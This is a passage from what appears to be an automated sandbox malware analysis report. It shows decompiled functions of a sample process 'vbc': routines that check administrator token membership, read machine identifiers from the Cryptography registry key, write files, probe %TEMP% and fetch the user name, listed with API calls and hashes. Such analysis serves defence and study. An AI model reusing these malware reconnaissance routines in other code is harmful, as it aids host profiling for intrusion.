                                                                                                    0x00407cf0
                                                                                                    0x00407cfc
                                                                                                    0x00407cf2
                                                                                                    0x00407cf4
                                                                                                    0x00407cf4
                                                                                                    0x00407d01
                                                                                                    0x00407d04
                                                                                                    0x00407d07
                                                                                                    0x00407d15
                                                                                                    0x00407d15

                                                                                                    APIs
                                                                                                    • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                                                                                                    • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 1602037265-0
                                                                                                    • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                    • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                                                                                                    • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                    • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407500 Relevance: 4.6, APIs: 3, Instructions: 76registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 60%
                                                                                                    			E00407500(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4, char _a8) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				intOrPtr* _t52;
				void* _t56;
				intOrPtr _t63;
				void* _t67;

				_v12 = __ecx;
				_v8 = __edx;
				_t56 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t67);
				_push(0x4075e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				if(_a8 != 1) {
					RegOpenKeyExW(_t56, E00403D3C(_v8), 0, 0x20019,  &_v24); // executed
				} else {
					_t52 =  *0x41b574; // 0x41c71c
					 *((intOrPtr*)( *_t52))(_t56, E00403D3C(_v8), 0, 0x20119,  &_v24);
				}
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				RegCloseKey(_t56); // executed
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004075EA);
				return E00403B98( &_v12, 2);
			}













                                                                                                    0x0040750a
                                                                                                    0x0040750d
                                                                                                    0x00407510
                                                                                                    0x00407515
                                                                                                    0x0040751d
                                                                                                    0x00407524
                                                                                                    0x00407525
                                                                                                    0x0040752a
                                                                                                    0x0040752d
                                                                                                    0x00407530
                                                                                                    0x00407537
                                                                                                    0x00407544
                                                                                                    0x00407582
                                                                                                    0x00407546
                                                                                                    0x0040755b
                                                                                                    0x00407562
                                                                                                    0x00407562
                                                                                                    0x004075a9
                                                                                                    0x004075b9
                                                                                                    0x004075c6
                                                                                                    0x004075ca
                                                                                                    0x004075cd
                                                                                                    0x004075d0
                                                                                                    0x004075e2

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                    • RegCloseKey.KERNEL32(80000002), ref: 004075C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocCloseOpenQueryStringValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3647234674-0
                                                                                                    • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                    • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                                                                                                    • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                    • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004072A0 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 65%
                                                                                                    			E004072A0(char __eax, void* __ebx, char __edx) {
				char _v8;
				char _v12;
				long _v16;
				void* _t21;
				long _t24;
				void* _t37;
				intOrPtr _t41;
				void* _t44;

				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E00403980(_v12);
				_push(_t44);
				_push(0x407334);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44 + 0xfffffff4;
				_t21 = CreateFileW(E00403D3C(_v8), 0xc0000000, 3, 0, 2, 0, 0); // executed
				_t37 = _t21;
				_t24 = E00403790(_v12);
				WriteFile(_t37, E004039E8( &_v12), _t24,  &_v16, 0); // executed
				CloseHandle(_t37); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E0040733B);
				E004034E4( &_v12);
				return E00403B80( &_v8);
			}











                                                                                                    0x004072a7
                                                                                                    0x004072aa
                                                                                                    0x004072b0
                                                                                                    0x004072b8
                                                                                                    0x004072bf
                                                                                                    0x004072c0
                                                                                                    0x004072c5
                                                                                                    0x004072c8
                                                                                                    0x004072ea
                                                                                                    0x004072ec
                                                                                                    0x004072f7
                                                                                                    0x00407307
                                                                                                    0x00407314
                                                                                                    0x00407318
                                                                                                    0x0040731b
                                                                                                    0x0040731e
                                                                                                    0x00407326
                                                                                                    0x00407333

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000000,00000000,00000000,00407334,?,00000000), ref: 004072EA
                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00407307
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00407314
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileString$AllocCloseCreateFreeHandleWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 4097030272-0
                                                                                                    • Opcode ID: 96112cf46e63d2d263f6c586123e846ce9d1e06681dd97ffb7b674c20077b506
                                                                                                    • Instruction ID: 3b510cbaec4aa3dd23b0a59a32c8df0f07f2b1188254ef1f4a9bf23c6d4a84f0
                                                                                                    • Opcode Fuzzy Hash: 96112cf46e63d2d263f6c586123e846ce9d1e06681dd97ffb7b674c20077b506
                                                                                                    • Instruction Fuzzy Hash: 4311EC70A04208BBD711EB65CC82F9EBBACEB48704F504076B914F72D1DA746E048A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004013EC Relevance: 3.8, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004013EC(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4); // executed
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4); // executed
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040123C(0x41c5d4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                                                                    0x004013f0
                                                                                                    0x004013f2
                                                                                                    0x004013f4
                                                                                                    0x004013f6
                                                                                                    0x0040140a
                                                                                                    0x0040140f
                                                                                                    0x00401411
                                                                                                    0x00401415
                                                                                                    0x0040141d
                                                                                                    0x00401423
                                                                                                    0x0040142f
                                                                                                    0x00401434
                                                                                                    0x00401434
                                                                                                    0x00401439
                                                                                                    0x00401442
                                                                                                    0x00401449
                                                                                                    0x00401455
                                                                                                    0x0040145c
                                                                                                    0x00000000
                                                                                                    0x0040145c
                                                                                                    0x00401449
                                                                                                    0x00401462

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0041C5E4,?,?,?,00401758), ref: 0040140A
                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0041C5E4,?,?,?,00401758), ref: 0040142F
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0041C5E4,?,?,?,00401758), ref: 00401455
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Alloc$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668210933-0
                                                                                                    • Opcode ID: d0f7f9bf85a63e2073a0b0aba1efbedd90cc19d60285e6920d01ae654114abd6
                                                                                                    • Instruction ID: 45c7259c7c7f7a53f47d7ebf7c15b413a2e3392a3d77efebc7c94e45ea16ea77
                                                                                                    • Opcode Fuzzy Hash: d0f7f9bf85a63e2073a0b0aba1efbedd90cc19d60285e6920d01ae654114abd6
                                                                                                    • Instruction Fuzzy Hash: 93F0C8B17403206ADB319A294C85F537AD49B4A764F144176BB08FF3DAD675580086AC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407B78 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                    • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CheckFreeMembershipToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 3914140973-0
                                                                                                    • Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                    • Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
                                                                                                    • Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                    • Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407B77 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                    • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CheckFreeMembershipToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 3914140973-0
                                                                                                    • Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                    • Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
                                                                                                    • Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                    • Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 65%
                                                                                                    			E00406DA8(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t56);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                                                    0x00406da8
                                                                                                    0x00406db6
                                                                                                    0x00406db9
                                                                                                    0x00406dc1
                                                                                                    0x00406dc9
                                                                                                    0x00406dd0
                                                                                                    0x00406dd1
                                                                                                    0x00406dd6
                                                                                                    0x00406dd9
                                                                                                    0x00406ddc
                                                                                                    0x00406de3
                                                                                                    0x00406e08
                                                                                                    0x00406e2f
                                                                                                    0x00406e3f
                                                                                                    0x00406e46
                                                                                                    0x00406e49
                                                                                                    0x00406e4c
                                                                                                    0x00406e5e

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFreeOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 967375698-0
                                                                                                    • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                    • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                                                                                                    • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                    • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 65%
                                                                                                    			E00406DAC(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t55);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                                                    0x00406db6
                                                                                                    0x00406db9
                                                                                                    0x00406dbc
                                                                                                    0x00406dc1
                                                                                                    0x00406dc9
                                                                                                    0x00406dd0
                                                                                                    0x00406dd1
                                                                                                    0x00406dd6
                                                                                                    0x00406dd9
                                                                                                    0x00406ddc
                                                                                                    0x00406de3
                                                                                                    0x00406e08
                                                                                                    0x00406e2f
                                                                                                    0x00406e3f
                                                                                                    0x00406e46
                                                                                                    0x00406e49
                                                                                                    0x00406e4c
                                                                                                    0x00406e5e

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFreeOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 967375698-0
                                                                                                    • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                    • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                                                                                                    • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                    • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004011E4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004011E4() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x41c5d0 != 0) {
					L5:
					_t4 =  *0x41c5d0;
					 *0x41c5d0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x41c5cc; // 0x4d5a48
						 *_t12 = _t6;
						 *0x41c5cc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x41c5d0;
							 *0x41c5d0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}









                                                                                                    0x004011ee
                                                                                                    0x0040122a
                                                                                                    0x0040122a
                                                                                                    0x0040122e
                                                                                                    0x00401232
                                                                                                    0x004011f0
                                                                                                    0x004011f7
                                                                                                    0x004011fc
                                                                                                    0x00401200
                                                                                                    0x00401207
                                                                                                    0x0040120c
                                                                                                    0x0040120e
                                                                                                    0x00401214
                                                                                                    0x00401216
                                                                                                    0x0040121a
                                                                                                    0x0040121a
                                                                                                    0x00401220
                                                                                                    0x00401222
                                                                                                    0x00401224
                                                                                                    0x00401225
                                                                                                    0x00000000
                                                                                                    0x00401202
                                                                                                    0x00401206
                                                                                                    0x00401206
                                                                                                    0x00401200

                                                                                                    APIs
                                                                                                    • LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocLocal
                                                                                                    • String ID: HZM
                                                                                                    • API String ID: 3494564517-3388050841
                                                                                                    • Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                                                                                                    • Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
                                                                                                    • Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                                                                                                    • Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                    0x0040138b
                                                                                                    0x00401395
                                                                                                    0x004013a4
                                                                                                    0x00401397
                                                                                                    0x00401397
                                                                                                    0x00401397
                                                                                                    0x004013aa
                                                                                                    0x004013b7
                                                                                                    0x004013bc
                                                                                                    0x004013be
                                                                                                    0x004013c2
                                                                                                    0x004013cb
                                                                                                    0x004013d2
                                                                                                    0x004013de
                                                                                                    0x004013e5
                                                                                                    0x00000000
                                                                                                    0x004013e5
                                                                                                    0x004013d2
                                                                                                    0x004013ea

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2087232378-0
                                                                                                    • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                    • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                    • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                    • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004076B0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 43%
                                                                                                    			E004076B0(char __eax, void* __ebx, void* __ecx) {
				char _v8;
				intOrPtr _t24;
				intOrPtr _t27;

				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t27);
				_push(0x4076fc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27;
				GetFileAttributesW(E00403D3C(_v8)); // executed
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E00407703);
				return E00403B80( &_v8);
			}






                                                                                                    0x004076b5
                                                                                                    0x004076bb
                                                                                                    0x004076c2
                                                                                                    0x004076c3
                                                                                                    0x004076c8
                                                                                                    0x004076cb
                                                                                                    0x004076de
                                                                                                    0x004076e8
                                                                                                    0x004076eb
                                                                                                    0x004076ee
                                                                                                    0x004076fb

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocAttributesFileFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2634384563-0
                                                                                                    • Opcode ID: 4a55e6a7ccd81ca30525239ac909850159b087d308325e78fb273df2937a63e3
                                                                                                    • Instruction ID: a7f0668d61e2dec431e32046e2844a6437fd6a4f389a52c14dd3b7fa7bab2667
                                                                                                    • Opcode Fuzzy Hash: 4a55e6a7ccd81ca30525239ac909850159b087d308325e78fb273df2937a63e3
                                                                                                    • Instruction Fuzzy Hash: A8F03074514608EFD701EB69CC5289EBBFCEB497647A1057AF410E35D1EB38BE00D568
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004065C4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004065C4(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403B80(_t14);
				} else {
					_t11 = E00403D10(_t14, 0x100,  &_v516);
				}
				return _t11;
			}











                                                                                                    0x004065c4
                                                                                                    0x004065c6
                                                                                                    0x004065c8
                                                                                                    0x004065cd
                                                                                                    0x004065d3
                                                                                                    0x004065d5
                                                                                                    0x004065e9
                                                                                                    0x004065ed
                                                                                                    0x00406603
                                                                                                    0x004065ef
                                                                                                    0x004065fa
                                                                                                    0x004065fa
                                                                                                    0x0040660f

                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2645101109-0
